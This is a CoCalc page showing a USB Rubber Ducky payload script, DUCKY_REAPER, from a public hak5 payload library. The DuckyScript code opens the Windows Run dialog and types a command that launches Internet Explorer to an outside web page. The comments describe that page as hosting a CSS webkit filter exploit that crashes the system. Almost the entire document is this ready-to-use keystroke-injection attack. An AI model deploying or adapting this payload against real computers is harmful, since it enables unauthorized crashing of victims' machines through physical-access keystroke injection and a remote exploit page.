Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/execution/DUCKY_REAPER/payload.txt
3018 views
1
REM Title: DUCKY_REAPER
2
REM Author: JonnyBanana
3
REM Requirements -none
4
REM How it works?
5
REM The script is a One-Liner and call an html page with a css webkit filter attack inside, this webpage crash the system ...
6
REM webpage with the exploit here: https://github.com/JonnyBanana/safari-ie-reaper.github.io
7
REM the script have 3 version (2 for windows and 1 for mac os)
8
REM all payloads here: https://github.com/JonnyBanana/DUCKY_REAPER
9
DELAY 2000
10
GUI R
11
DELAY 500
12
STRING iexplore https://jonnybanana.github.io/safari-ie-reaper.github.io
13
DELAY 500
14
ENTER
15
16